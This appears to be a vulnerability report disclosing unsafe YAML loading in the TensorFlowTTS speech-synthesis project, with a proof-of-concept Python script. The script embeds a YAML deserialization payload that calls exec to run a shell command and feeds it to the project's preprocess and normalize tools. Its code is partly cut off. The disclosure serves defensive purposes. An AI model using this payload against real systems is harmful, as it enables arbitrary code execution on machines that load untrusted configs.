Code Injection in tensorspeech/tensorflowtts


Reported on

Jan 30th 2021

✍️ Description

TensorFlowTTS provides real-time state-of-the-art speech synthesis architectures such as Tacotron-2, Melgan, Multiband-Melgan, FastSpeech, FastSpeech2 based-on TensorFlow 2. With Tensorflow 2, we can speed-up training/inference progress, optimizer further by using fake-quantize aware and pruning, make TTS models can be run faster than real-time and be able to deploy on mobile devices or embedded systems.

  • Vulnerability discription Vulnerable to yaml deserilisation attack caused by unsafe loading.

🕵️‍♂️ Proof of Concept

  • run the exploit code
import os
os.system('pip install TensorFlowTTS')
exploit = '''!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
os.system('rm exploit.yml exploit.yaml')
print("\n\nexploiting preprocess in tts")
cmd = str('''tensorflow-tts-preprocess --rootdir ./ --outdir ./ --config exploit.yml ''')
print("\n\nexploiting normalize in tts")
cmd1 = str('''tensorflow-tts-normalize --rootdir ./ --outdir ./ --config exploit.yml ''')
to join this conversation